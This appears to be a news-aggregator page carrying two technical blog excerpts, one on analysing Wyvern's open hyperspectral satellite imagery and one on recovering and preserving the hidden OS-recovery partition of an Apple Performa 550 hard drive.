Last month, Wyvern, a 36-person start-up with $16M USD in funding in Edmonton, Canada launched an open data programme for their VNIR, 23 to 31-band hyperspectral satellite imagery.
The imagery was captured with one of their three Dragonette 6U CubeSat satellites. These satellites were built by AAC Clyde Space which has offices in the UK, Sweden and a few other countries. They orbit 517 - 550 KM above the Earth’s surface and have a spatial resolution at nadir (GSD) of 5.3M.
SpaceX launched all three of their satellites from Vandenberg Space Force Base in California. They were launched on April 15th, June 12th and November 11th, 2023 respectively.
There are ~130 GB of GeoTIFFs being hosted in their AWS S3 bucket in Montreal. The 33 images posted were taken between June and two weeks ago.
I’m using a 5.7 GHz AMD Ryzen 9 9950X CPU. It has 16 cores and 32 threads and 1.2 MB of L1, 16 MB of L2 and 64 MB of L3 cache. It has a liquid cooler attached and is housed in a spacious, full-sized Cooler Master HAF 700 computer case.
The system has 96 GB of DDR5 RAM clocked at 4,800 MT/s and a 5th-generation, Crucial T700 4 TB NVMe M.2 SSD which can read at speeds up to 12,400 MB/s. There is a heatsink on the SSD to help keep its temperature down. This is my system’s C drive.
The system is powered by a 1,200-watt, fully modular Corsair Power Supply and is sat on an ASRock X870E Nova 90 Motherboard.
I’m running Ubuntu 24 LTS via Microsoft’s Ubuntu for Windows on Windows 11 Pro. In case you’re wondering why I don’t run a Linux-based desktop as my primary work environment, I’m still using an Nvidia GTX 1080 GPU which has better driver support on Windows and I use ArcGIS Pro from time to time which only supports Windows natively.
I’ll use GDAL 3.9.3, Python 3.12.3 and a few other tools to help analyse the data in this post.
I’ll set up a Python Virtual Environment and install some dependencies.
I’ll use my GeoTIFFs analysis utility in this post.
I’ll use DuckDB, along with its H3, JSON, Lindel, Parquet and Spatial extensions, in this post.
I’ll set up DuckDB to load every installed extension each time it launches.
The maps in this post were rendered with QGIS version 3.42. QGIS is a desktop application that runs on Windows, macOS and Linux. The application has grown in popularity in recent years and has ~15M application launches from users all around the world each month.
I used QGIS’ Tile+ plugin to add geospatial context with Bing’s Virtual Earth Basemap as well as CARTO’s to the maps. The dark, non-satellite imagery maps are mostly made up of vector data from Natural Earth and Overture.
Below is PulseOrbital’s list of estimated Tallinn flyovers by Wyvern’s Dragonette constellation for March 8th and 9th, 2025.
Below I’ll try to estimate the current locations of each of their three satellites. I found the Two-line elements (TLE) details on n2yo.
I ran the following on March 10th, 2025. It produced a CSV file with names and estimated locations of their three satellites.
Below is a rendering of the above CSV data in QGIS.
Wyvern have a STAC catalog listing the imagery locations and metadata around their capture. I’ll download this metadata and get each image’s address details with Mapbox’s reverse geocoding service. Mapbox offer 100K geocoding searches per month with their free tier.
The above produced a 33-line JSONL file. Below is an example record.
I’ll load their imagery metadata into DuckDB for analysis.
Below are the image counts by country and city. Some areas are rural and Mapbox didn’t attribute any city to the image footprint’s location.
Below are the locations of the images.
These are the months in which the imagery was captured.
The majority of imagery is from their first satellite but there are four images from their third. Their second and third satellites can collect a wider spectral range, with more spectral bands at a greater spectral resolution.
All of the imagery has been processed to level L1B and, with the exception of one image, to version 1.3.
Below I’ll bucket the amount of cloud cover in their imagery to the nearest 10%.
The imagery Wyvern delivers are Cloud-Optimised GeoTIFF containers. These files contain Tiled Multi-Resolution TIFFs / Tiled Pyramid TIFFs. This means there are several versions of the same image at different resolutions within the GeoTIFF file.
These files are structured so it’s easy to only read a portion of a file for any one resolution you’re interested in. A file might be 100 MB but a JavaScript-based Web Application might only need to download 2 MB of data from that file in order to render its lowest resolution.
The following downloaded 130 GB of GeoTIFFs from their feed.
Below you can see the five resolutions of imagery with the following GeoTIFF. These range from 6161-pixels wide down to 385-pixels wide.
Below is a 23 x 30 KM image of Los Angeles.
This is its metadata for reference.
The following bands are present in the above image.
Most images contain 23 bands of data though there are four images in this feed that contain 31 bands.
If you open the properties for the above image’s layer in QGIS and select the “Symbology” tab, you can re-map the bands being used for the red, green and blue channels being rendered. Try the following:
Under the “Min / Max Value Settings” section, check the radio button next to “Min / max”.
Below is what the settings should look like:
Hit “Apply” and the image should look more natural.
Below is a comparison to Bing’s imagery for this area.
Below is a comparison to Esri’s imagery for this area.
Below is a comparison to Google’s imagery for this area.
Below is a comparison to Yandex’s imagery for this area.
QGIS 3.42 was released a few weeks ago and now has STAC catalog integration.
From the Layer Menu, click Add Layer -> Add Layer from STAC Catalog.
Give the layer the name “wyvern” and paste in the following URL:
Below is what the fields should look like.
Click OK, then Close on the next dialog and return to the main UI. Don’t click the connect button as you’ll receive an error message and it isn’t needed for this feed.
Click the View Menu -> Panels -> Browser Panel. You should see a STAC item appear in that panel and underneath you should be able to browse the various collections Wyvern offer.
Right clicking any asset lets you both see a preview and details on the imagery. You can also download the imagery to your machine and into your QGIS project.
Thank you for taking the time to read this post. I offer both consulting and hands-on development services to clients in North America and Europe. If you’d like to discuss how my offerings can help your business please contact me via LinkedIn .
...
Read the original on tech.marksblogg.com »
In my last post about hard drives that go bad over time, I hinted at having rescued a lost piece of obscure Apple software history from an old 160 MB Conner hard drive that had its head stuck in the parked position. This post is going to be all about it. It’s the tale of a tad bit of an obsession, what felt like a hopeless search, and how persistence eventually paid off. There’s still an unsolved mystery too, so I’m hoping others will see this and help to fill in the blanks!
This whole saga starts with a very interesting blog post written by Pierre Dandumont in 2022. Pierre’s (excellent) blog is in French — Google does a good job of translating it for me. He found a quote in a book referring to special functionality bundled with Apple’s Macintosh Performa 550 computer:
If Apple’s programmers, in creating the Performa series, were aiming to make idiot-proof computers, they were serious about it. The Performa 550 is an amazing case in point. When you run the included Apple Backup program (see Chapter 15), you get a little surprise that you didn’t count on: a hidden partition on your hard drive!
This invisible chunk of hard drive space contains a miniature, invisible System Folder. Apple’s internal memo explains it this way:
“When a system problem (one that prevents the Performa from booting) is detected, a [dialog box] informs the user of a system problem. The user can choose to fix the problem manually or to reinstall software from the backup partition’s Mini System Folder.”
If you choose to reinstall your System software, you get the wristwatch cursor for a moment while the miniature System Folder is silently copied to your main hard-drive partition. The Performa restarts from the restored hard drive, and the invisible system partition disappears once again.
We got a Performa team member to admit that this kind of sneaky save-the-users-from-themselves approach may well be adopted in other Performa models.
Who knows what goodness lurks in the hearts of men?
Cool! Although I have owned my own copy of this book for decades, I had no recollection of ever reading this little blurb. The book, if you’re curious, is Macworld Mac Secrets by David Pogue and Joseph Schorr. I found this whole functionality very intriguing, particularly because I had what felt like a very personal connection to it: the very first Mac that my family had when I was growing up was a Performa 550. I don’t think I have any pictures from back then, but in the meantime I’ve acquired one that looks exactly identical, so here’s a (slightly blurry) view of the type of machine I’m talking about in this post:
I know that many people think the LC/Performa 5xx case style is ugly, but I really like it! I’m definitely biased though.
This is an early model manufactured in September of 1993, which came with a caddy-loading CD-ROM drive (AppleCD 300i). Like other Macs from the same era, newer versions from 1994 came with a tray-loading drive instead (AppleCD 300i Plus). For comparison, here’s a photo of a late-model Performa 550 with a manufacture date of March 1994 that re4mat kindly gave me permission to share here:
Pierre asked me if I had a copy of Apple’s software restoration CD for the Performa 550, and if I knew how to get it working in an emulator in order to try out this special functionality. I pointed him to a download link for the Performa CD for the 500 Series, version 7.1P6:
If you weren’t using multimedia computers in the early 1990s, you might not recognize the weird rectangular container that this CD is enclosed inside of. It’s a CD caddy, and it’s what was used for inserting CDs into computers like the first one pictured above. You would open the caddy by squeezing the top right and bottom right ends toward each other, stick the disc into it, close it, and then push it into the slot in the computer, similarly to how you would insert a floppy disk. I really don’t miss these things one bit!
Back to the story, though. I also gave Pierre some tips for using the restore CD in an emulator. Nowadays, my advice is outdated because it’s much easier to use Apple restore CDs in at least one emulator — MAME has come a long way in the last few years. He figured out a bunch more stuff on his own after that, including trying it in his own Performa 450 (not 550), but the bottom line was that the recovery partition was nowhere to be found.
Well, sort of. He found that the process of restoring from the CD actually did create a recovery partition. Here’s a screenshot of the partitioning from inside of Apple HD SC Setup while booted from the Performa CD, after formatting the hard drive by clicking the Initialize button in the main window:
As you can see, there’s a 2,560 KB partition of type Apple_Recovery almost at the end of the drive, just after the main partition named “Hard Disk”. This was promising at first glance, but the partition was empty! Further testing revealed that the custom Performa-specific version of Apple HD SC Setup (7.2.2P6) bundled on the CD was responsible for creating it, but didn’t actually populate it with any data. Apple Backup also didn’t put anything onto the partition, despite what the book said. I even looked through my past disassemblies of the Apple Backup and Apple Restore code and confirmed that there was nothing related to creating a recovery partition.
The conclusion at the time was that someone needed to get ahold of a Performa 550 that still had its original hard drive and had never been reformatted. That’s where this story sat for 3 years.
A few months ago, I remembered this whole situation and decided that I really wanted to try to find this partition. After all, the clock had always been ticking. The longer we waited, the fewer and fewer original Performa 550s would be out there in the wild. Not to mention that hard drives go bad and people throw them out without knowing that it’s usually possible to recover data from drives of this era. I confirmed all of Pierre’s findings in MAME. I even tried using Apple Backup in case I missed something, but no, it didn’t do anything with the hidden recovery partition. An easy way to look at it is to manually edit the partition table in a hex editor and change the type from Apple_Recovery to Apple_HFS.
After doing this and booting up, I found another hard drive icon on my desktop called Recovery Volume, but it was empty, just like Pierre said:
Taking it a bit further, I tried recreating the recovery functionality myself. I copied a minimal system folder to the Recovery Volume, and then changed its type back to Apple_Recovery. This made it invisible again. Then I screwed up my main system folder and rebooted. Sure enough, it automatically came up with the Recovery Volume as the main boot volume.
This proved that the mechanism for booting from the recovery partition worked; we were just missing the data that was supposed to be on it. I came to the same conclusion that Pierre had already reached: we needed to find a Performa 550 that had never been reformatted. In the meantime, I spent some time digging into archives of Apple’s old tech notes and found several more references to this functionality.
System 7: Performa Versions Compared (9/95) — the first bullet point under System Software Version 7.1P6 refers to this feature:
Backup Partition Software-automatically detects corrupted system folders. When a bad System Folder is detected, the user is given the option to re-load another System Folder into their system.
Performa 550: Description of Backup Partition (3/94) — this note is clearly the “internal memo” that Macworld Mac Secrets was quoting. Some interesting excerpts from this article:
The Apple Backup application creates a backup recovery partition that allows the Performa to boot even when the System Software on the main hard drive has been corrupted. The partition is invisible to the user.
There is no built-in limit to the number of times the backup partition can be used. However, the partition will be lost if the hard drive is re-formatted. At this time the backup partition is used only on the Performa 550.
Performa 550: System Folder Created w/ Dinosaur Safari CD (8/94) — not that I needed any more proof of the recovery partition’s existence at this point, but I got a kick out of this one. It talks about how launching an educational game about dinosaurs accidentally caused the system to go into recovery mode. It provided a little more info about what would happen when the recovery dialog popped up:
When I launch the Dinosaur Safari CD from Creative Multimedia, a dialog box appears telling me that my Performa computer is having trouble starting up. I only have two options Shutdown or Continue? Why?
After reading these articles, I was very convinced that the recovery partition was a real thing that existed, but I was also pretty confident that Apple Backup wasn’t responsible for creating it, despite Apple claiming otherwise. I had already seen that the special build of Apple HD SC Setup was what actually created it, and plus, like I said earlier, I had looked closely into a disassembly of the version of Apple Backup supplied with the Performa 500 series restore CD. There was nothing that copied any files to another partition on the hard drive, at least not that I could see.
Really, the most important thing I gained from this exercise was that the second tech note confirmed the need to find a Performa 550 that had never been reformatted. Also, if the first tech note was to be believed, it needed to have come with System 7.1P6. This could narrow the search even further — I know for a fact that earlier Performa 550 models came with 7.1P5, including my childhood one. The same tech note also pointed out that 7.1P6 was the first version to support the “AppleCD 300+”, which is referring to the tray-loading CD-ROM drive. Based on this information, it’s reasonable to deduce that all Performa 550s with a tray-loading CD-ROM drive would probably have originally come with at least System 7.1P6.
There was only one thing left to try at this point: asking the Internet for help. I asked people everywhere I could think of: Tinker Different, 68kMLA (where Pierre had already asked), and various social media sites. I searched Reddit and found people who had posted in the past about having a 550, asking if they still had the hard drive. I think I scared some of them — at least one person deleted their post after I asked! To be honest, I can’t blame them. I can imagine how freaky it would be to hear from someone begging to look at my hard drive’s contents. I’m sure some people might think of it as crossing a line, but it’s not as crazy of an ask if it’s a machine they’ve received second-hand from someone else. Plus, I was very clear about exactly what I was looking for (and why).
I asked a seller of a Performa 550 that had been sitting on eBay for a long time if they would be willing to sell me the hard drive separately. They weren’t interested. I even bought some random hard drives on eBay that definitely went with a 5xx-style case. These were easy to identify because this case style uses a unique adapter for plugging the drive into the chassis wiring harness when you slide it into place.
What do I have to show for all of these eBay purchases? Well, after dumping them all with my ZuluSCSI in initiator mode, I can say that the one pictured above came from a Macintosh TV. I also found another one from an LC 575. Lastly, I bought yet another drive that the seller said came from a Performa 577. The Performa 577 one was funny — it had all the Mac mounting hardware on it, but when I dumped it, it turned out to be from an Atari TT or Falcon (not sure which). I’d love to hear the story of how it ended up with an LC 5xx drive sled and adapter on it! Needless to say, none of them had the elusive recovery partition. One particularly friendly eBay seller was even nice enough to show me a preview of a drive’s contents in HFSExplorer, which helped me determine that it wasn’t from a Performa.
I almost began questioning my sanity at one point during this search. Multiple people initially told me that they thought I was confused about this whole thing. I pointed them toward Apple’s tech notes describing it. Were Pierre and I imagining this whole thing? Were Apple’s tech notes all a lie?
The thing is, this whole functionality was super obscure. It’s understandable that people weren’t familiar with it. Apple publicly stated it was only included with this one specific Performa model. Their own documentation also said that it would be lost if you reformatted the hard drive. It was hiding in the background, so nobody really knew it was there, let alone thought about saving it. Also, I can say that the first thing a lot of people do when they obtain a classic computer is erase it in order to restore it to the factory state. Little did anyone know, if they reformatted the hard drive on a Performa 550, they could have been wiping out rare data that hadn’t been preserved!
Someone who saw my post on Reddit mentioned that they had a Performa 550 and would check it out. It was a newer tray-loading model with a January 1994 manufacture date. Unfortunately, the Conner hard drive inside of it wouldn’t cooperate, and plus this person didn’t have anything capable of dumping the contents. Luckily for me though, they were totally comfortable with letting me borrow the drive and try to recover the data from it.
To tie everything together, we have now reached the point in this story that I covered in my last post about hard drives with stuck heads. As I mentioned in that blog, I could not get this drive to do anything. It would just spin up, sit there for a while, spin down, and then make an annoying buzzing sound for a while, repeating that whole process over and over again.
I tried all kinds of things. I nudged the head while the platters were spinning, inspected it with my thermal camera to see if any components were getting hot, and tried it at different temperatures — cold shortly after it arrived, and at room temperature later. The only thing I noticed was that when it was making the buzzing sound, one of the IRFD123 MOSFETs would get much hotter than normal: up near 100 degrees Celsius.
I wasn’t really sure what to do with this information though. It just seemed wrong that the head wasn’t moving at all. That’s when I finally decided to inspect everything further inside the drive and noticed the head stack seemed like it was sticking to a rubber/plastic looking piece. The Kapton tape trick I figured out and showed off in the last post finally allowed me to dump the drive contents. If you didn’t catch it last time, here’s a video showing how it was stuck, along with a successful dump with the help of the tape:
As soon as the drive imaging process completed, I powered everything off and anxiously opened the hard drive image file with my favorite hex editor (HxD):
Boom! This drive had a recovery partition on it! Now, that didn’t necessarily mean anything. After all, I had already seen an empty partition created by Apple HD SC Setup on the Performa CD. Still, though, it was definitely promising. Here’s an interpretation of the data at the beginning of the entry in the partition table:
50 4D = PM = Signature
00 00 = Padding
00 00 00 05 = 5 total partitions on the drive
00 04 E2 60 = starting physical block of the partition (0x4E260 blocks = 0x9C4C000 bytes)
00 00 14 00 = size of partition in blocks (0x1400 blocks = 0x280000 bytes = 2560 kilobytes)
name = MacOS
type = Apple_Recovery
Also, just like in the partition table created by the Performa CD that I had inspected earlier, there were four bytes “msjy” at an offset of 0x9C bytes into the partition table entry. No other partitions had any data at 0x9C. I wonder if these are a couple of developers’ initials hiding in there or something? Is it an acronym? “Make Steve Jobs Yodel”? I even asked ChatGPT to come up with a playful interpretation in the context of Macs in the mid-1990s. It suggested “My System Jammed Yesterday”, explaining it as a playful nod to the “chaotic charm” of the era’s extension conflicts and Sad Mac screens. I didn’t even mention anything about it involving OS recovery. Tell me how you really feel about old Macs, ChatGPT!
Knowing that the partition was there, the next step was to look near the end of the dumped drive image in HxD. If the partition had any actual data stored, it would be very obvious because starting at 0x9C4C000 in the file, there would be actual data and not just a bunch of zeros.
This is where I started to actually get excited. The partition contained boot blocks! This was obvious because of the starting signature of LK and all of the various system file names plainly visible. On the other hand, the recovery partition created by the Performa CD during testing had zeros at this location — no boot blocks.
These boot blocks are identical to the main partition’s boot blocks, except for one very important difference: at 0x1A, the Pascal string containing the Finder name is “recovery” instead of “Finder” like you’d normally see. This means that if you boot from this partition, it will load a program named recovery instead of the usual Finder app you’d expect on most Mac OS installs.
This was definitely something special that the restore CD was not capable of recreating. As I scrolled further down through the partition, it quickly became obvious that it actually had some files!
Okay, now I was totally stoked! I booted up a copy of the imaged drive in MAME and immediately noticed that there was evidence that the recovery partition had definitely activated itself on this machine in the past: there was a folder named Mini System Folder on the desktop with a creation date in 2004, and the trash contained an app called Read Me Mini System Folder with the exact same date.
I wanted to experience the automatic OS recovery process for myself without any customizations from the original owner of the machine this hard drive came from, so I used HxD to copy the entire 2,560 KB recovery partition onto the fresh hard drive image I had created by restoring from the Performa CD. This was easy because the Performa version of Apple HD SC Setup had created an empty recovery partition with the exact same size. Then I booted it up in MAME and dragged the System file out of my System Folder in order to intentionally mess it up. I had to turn off System Folder Protection in the Performa control panel first:
This is the classic kind of mistake that would have normally left you with an unbootable system showing a floppy disk icon with a flashing question mark. Would Apple’s automatic Performa OS recovery save me from myself? I rebooted to see what would happen. Instead of seeing a flashing question mark, I saw a Happy Mac very briefly before the system rebooted itself again. Then another Happy Mac showed up, and this time, it looked like a normal boot, except no extension icons showed up at the bottom of the screen. It was definitely booting from the recovery partition. Eventually, I was greeted with this screen:
Hooray! This was exactly the dialog box that Macworld Mac Secrets and Apple’s tech note had referred to. The recovery partition had been successfully rescued!
Let’s walk through the rest of this feature. If you click Shut Down, obviously the machine turns itself off. But when it boots back up, the recovery partition doesn’t automatically kick in anymore. So you’re on your own to fix the problem by booting from the Performa CD or the Utilities floppy disk.
On the other hand, clicking OK does exactly what the tech note describes. You get the wristwatch cursor for a few seconds, the system reboots, and then you are greeted with this amazing screen, complete with an ugly yellow desktop pattern. Shall we call it the yellow screen of shame? Notice that the Mini System Folder on the desktop is the active System Folder, because it has the special icon.
Here are the rest of the pages in this Read Me Mini System Folder app:
Aha! So it’s not entirely automatic, since you still have to manually drag the System, Finder, and System Enablers from the Mini System Folder back to your original System Folder. Still though, it’s a very handy solution that gives you a bootable machine when something goes wrong with your OS.
If you just ignore these instructions and keep using the computer, you will be nagged with this Read Me on every boot because it lives inside the Startup Items folder of the Mini System Folder. The Read Me also appears on your desktop, but for some reason it doesn’t show up until you open the Hard Disk icon.
Let’s take a deeper look at how it all works by temporarily changing the partition type to Apple_HFS instead of Apple_Recovery and booting up again, so we can inspect the files. After a quick automatic rebuild of the desktop file, the Recovery Volume appears, with actual contents this time!
Inside of the System Folder, there are definitely some interesting things. As expected based on the earlier analysis of the boot blocks, there is an app named “recovery” that contains all of the interesting stuff. The icons are kind of arranged willy-nilly in here.
The creator code of the recovery app is msjy — the exact same magic value we saw in the partition table entry.
Scrolling further down, there is a System file and various enablers. Everything is marked as being part of System Software v7.1P6.
It’s interesting to me that although this recovery partition was only available on the 550, it still has a bunch of enablers for other Performa models: the 45x/46x, 47x/57x, and 600. I guess that’s not too crazy considering all of these exact same enablers are included with a fresh copy of System 7.1P6 installed using the Performa CD.
As a quick detour, System Enabler 316 is an interesting one that is hard to find info about on the Internet. I inspected its ‘gbly’ resource and determined that it’s for the Centris 610, Centris 650, and Quadra 800. It’s an older version of the enabler created before the speed-bumped Quadra 610 and Quadra 650 were a thing. I wonder if there was a plan at some point to have a Performa model based on one of those machines? If I had to guess, maybe it would have been a 68040-based successor to the Performa 600, which uses the same case style as the Centris 650. The Performa 650?
Let’s not get too far off track. Back to the Recovery Volume’s System Folder — as expected, the Startup Items folder contains the Read Me application:
Everything started to become clear. The recovery app was marked as the startup application instead of the Finder. It displayed the dialog giving the user the option to recover. If they clicked OK, it would copy the entire System Folder from the Recovery Volume, omitting itself, to the Desktop Folder of the main hard drive partition. Then, it would “bless” the newly-copied mini System Folder and reboot.
How did all this stuff get into the partition? Did Apple Backup do it, or was it factory-programmed data? I tried to see if I could deduce anything from the dates of the files. In order to preserve the integrity of all of the displayed dates, I performed this analysis with a read-only copy of the original drive image in order to prevent any modification dates from being updated.
All of the files in the partition have a creation date of March 4, 1994 — over 31 years ago! Most of the files have a matching modification date, except for the System suitcase, which was last modified on September 26, 1994. I don’t know exactly what this all means, considering it came from a machine with a January 1994 manufacture date.
The Recovery Volume itself also has a creation date of March 4th, just five minutes before the creation date of all the files. Interestingly, the modification date of the volume is still shown as March 4th in the Get Info window, even though the System suitcase was modified later in September of that year.
The Master Directory Block of the Recovery Volume says the modification date (drLsMod) is September 26th, matching when the System file was changed. I’m not sure what causes this discrepancy. I guess the date displayed in the Get Info window isn’t simply the date stored in the Master Directory Block.
Similarly, although the main hard drive partition has a creation date of December 5, 1993 according to the Master Directory Block, the Get Info window says it was created on February 3, 1994. I’m not sure which one is more accurate. Either way, it’s pretty clear this drive had not been reformatted. I did find it curious that the recovery partition was created over a month later, though. When you reformat a hard drive using the special version of Apple HD SC Setup on the Performa CD, the recovery partition ends up with a creation date about a minute after the main partition.
The Finder and System Enablers in the recovery partition are identical to the same stock files from a 7.1P6 restore. The only difference I could find in the System file was that the recovery partition’s version was missing a single At Ease ‘INIT’ resource, but the At Ease Startup extension automatically adds it to the System file after you reboot. This leaves you with a System file totally identical to what is restored from the Performa CD. I find it odd that At Ease was stripped out, but the American Heritage Dictionary ‘FKEY’ resource was not.
The best theory that I can come up with is that Apple Backup really was responsible for creating this partition. After all, Apple went out of their way to specifically mention it in their tech note. Maybe March 4th, 1994 was the date when the original owner of the computer backed it up for the first time. September 26th could have been the last time that Apple Backup was run. Perhaps the owner completely uninstalled At Ease from the computer between March and September, so the System file had been changed and the recovery copy needed to be updated accordingly? Unfortunately, most of the Performa-specific software had been deleted from this computer. It was still running System 7.1P6, but Apple Backup was nowhere to be found. So I wasn’t able to confirm whether or not a mysterious, unpreserved newer version of Apple Backup was really responsible for populating the partition.
The other theory floating around in my head is that maybe it came from the factory like this. The March 1994 timeline is consistent with the date of the tech note describing the functionality, so maybe that’s when Apple created it and started bundling it. I don’t know how long the machines sat at Apple’s factory before they were actually sold — does a manufacture date of January 1994 also mean it was shipped to a store in January 1994? Either way, I definitely don’t know how to explain the September 26th, 1994 modification date. Maybe a third-party utility did something to the System file on the secondary partition? The first Apple Backup theory seems like the more likely explanation, especially given that Apple said that’s how it was created.
This whole question is the last piece of the puzzle that hasn’t been solved yet. If anyone else has a Performa 550 and would be willing to dump their hard drive or at least look at Apple Backup, I’d be very interested in finding out A) if it has the recovery partition and B) if there was a special newer version of Apple Backup that didn’t make its way onto the Performa CD. I searched for various strings that show up in the “recovery” and “Read Me Mini System Folder” apps, and they aren’t anywhere on the Performa CD. I guess they could be stored compressed somewhere, but I’m pretty confident based on the actual Apple Backup code that nothing is hiding in there. Here are the various versions (with their exact sizes and dates) of Apple Backup that I have seen on Performa 550 installations. None of these have the recovery partition creation built in:
I also found version 1.3 (June 15, 1994, 163,388 bytes used) by restoring from a Performa 636 restore CD. It, too, does not contain any recovery partition code.
For a demo, I thought it would be fun to replicate the problem that the Apple tech note mentioned about the Dinosaur Safari CD inadvertently activating the recovery partition, so I bought a copy to test it out. To make it even more interesting, I decided to run this test on real hardware. I’m leaning toward believing that a lot of the older caddy-loading models (possibly all of them) didn’t have this recovery partition, so just pretend it’s a newer model that came with System 7.1P6. I copied the recovery partition onto a real Apple-branded IBM 160 MB SCSI hard drive using ZuluSCSI’s USB MSC initiator mode, which allows it to act as a USB-to-SCSI bridge. Sorry about the flickery screen; I couldn’t get my phone camera’s shutter speed to sync up perfectly with the display’s refresh rate.
Sure enough, when I opened the game from the CD, the computer did exactly what Apple’s tech note said it would do. The workaround of copying the application to my hard drive worked just fine. If it’s not obvious, I sped up the process of copying it to the hard drive — it took a while! It might be interesting someday to look into why this game accidentally activated the OS recovery, but this blog is already getting way too long!
I want to talk a little more about the yellow screen of shame. When I first saw it, I wasn’t entirely sure if it was really part of the recovery functionality or if the original owner just had terrible taste.
Digging deeper, I found three clues that all made it clear it was an intentional choice by Apple to really make it obvious that something was wrong. First, the yellow pattern is stored as a ‘ppat’ resource in the recovery app.
Second, the System file in the recovery partition has the default blue-gray Performa background shown in the screenshots above. This makes sense, because it’s the pattern that showed up with the dialog about the Performa having trouble starting up.
And lastly, page 3 of the Read Me app implies that something may have changed your desktop pattern.
So clearly, the recovery process, by design, sets up the custom yellow background.
Why did I care so much about finding this lost partition? Well, there are a number of reasons. For one, this is exactly the kind of research project that’s perfect for me because I don’t know how to let things go. It’s also something that, quite frankly, needed to be preserved before it became extinct. The most important reason, though, is that this functionality is historically significant and deserves some attention. How many personal computers in 1994 still had the ability to boot after the OS was trashed? Isn’t this an extremely early example of this type of functionality? Did Windows have anything like this prior to Vista? Did the Mac have anything else like this prior to sometime in the OS X era? I would love to hear more comments about what you think on this. I admittedly don’t know a ton about older machines that weren’t Macs.
I’m not saying this feature is perfect. Since we’ve already seen that the Dinosaur Safari CD was able to accidentally activate it, I wouldn’t be surprised if there were other ways to inadvertently cause it to pop up too. It also required manual intervention after the recovery process, which meant that you needed a fair amount of computer knowledge to finish fixing your OS. The average Joe Schmoe would probably have trouble following these directions to fix the System Folder. But still, it leaves you with a bootable system instead of an unusable computer with a flashing question mark. It’s very cool, especially for 1994.
I wonder why Apple didn’t continue down this path with subsequent models? Or even retroactively adding the functionality to earlier ones after a fresh install of a newer OS. I’m not aware of any other Macs that have this partition. It doesn’t depend on any special ROM support or anything like that, at least as far as I can see. I tried out the recovery functionality on several other machines: a IIci, LC, LC 475, and an emulated Performa 600, and it works great on all of them. Heck, it even works on the Classic II/Performa 200!
It kind of looks like the window size of the Read Me app was a calculated decision to ensure it would fit on the 512×342 screen used in black-and-white compact Macs.
Thinking about later models, the Performa 630 series used an internal IDE hard drive instead of SCSI, so the custom version of Apple HD SC Setup was no longer used. I wonder if the Performa 57x series had this partition? You’d think they would have had the exact same software bundle as the tray-loading 550 models. If any readers have a Performa 57x machine, I’d greatly appreciate it if you could check!
How did this functionality actually work under the hood? I haven’t gone too deep into the code (maybe it can be a future post), but I have pieced together a few clues. The “msjy” magic number I talked about earlier definitely plays a part in everything. The special Performa version of Apple HD SC Setup also includes a custom version of Apple’s hard disk driver. This driver contains several references to msjy, so I’m pretty sure that’s what it uses to identify the recovery partition.
I also discovered that the 7.1P4 and 7.1P5 Utilities floppy disks, which were bundled with various Performas, have slightly older custom versions of Apple HD SC Setup: 7.2.1P and 7.2.2P respectively. They also create the recovery partition. The interesting thing about these versions is that it appears Apple accidentally forgot to strip out the debug function names, in both the utility itself and the bundled hard disk driver. They didn’t make this mistake in the original non-Performa 7.2.2 version, and they also didn’t make the mistake in the newer 7.2.2P6 version. Anyway, this is kind of cool, because it tells me the names of functions that look for “msjy” at an offset of 0x9C. Function names in that same area of the driver code include: recvrybootable, confirmminsystem, flushrecoveryflag, recoveryvolexists, and setrecoveryflags. So Apple definitely at least sort of released some of the recovery functionality to the public prior to 7.1P6, despite what their own version history says. And the disk driver is definitely involved in it.
Newer versions of Apple’s disk driver no longer contain the magic number, so at some point they must have abandoned this functionality. In my opinion, it’s a real shame that they ditched it — this could have been very useful going forward on all Macs. They could have even expanded on it and automated more of the recovery process. Sure, it used some of your hard drive space, but it could have been a good trade-off for better reliability.
That’s more than enough technical stuff for one post. I am sharing a download link where you can try this functionality out for yourself if you want. After all, the whole reason I did this was for software preservation purposes, so it makes sense to share it with the world. This is a small piece of Apple software history that, to my knowledge, has not been preserved until now. I uploaded a drive image to the Macintosh Garden. Don’t worry, I didn’t include any of the original owner’s personal data. I started fresh with a blank hard drive image, restored it using the 7.1P6 Performa CD, and then only copied over the restore partition from the dumped hard drive. So this is a factory-fresh Performa 550 7.1P6 install with the recovery partition also present and populated.
The MAME command that I use to boot from this disk image is:
mame maclc550 -scsi:0 harddisk -harddisk1 Performa550.hda -window -nomaximize -ramsize 32M
Of course, you can also test it out on a real machine by copying the hard drive image to a ZuluSCSI or BlueSCSI and naming it something like HD00.hda.
Winding down this super long post now, the main lessons I learned from this research project are:
...
Read the original on www.downtowndougbrown.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.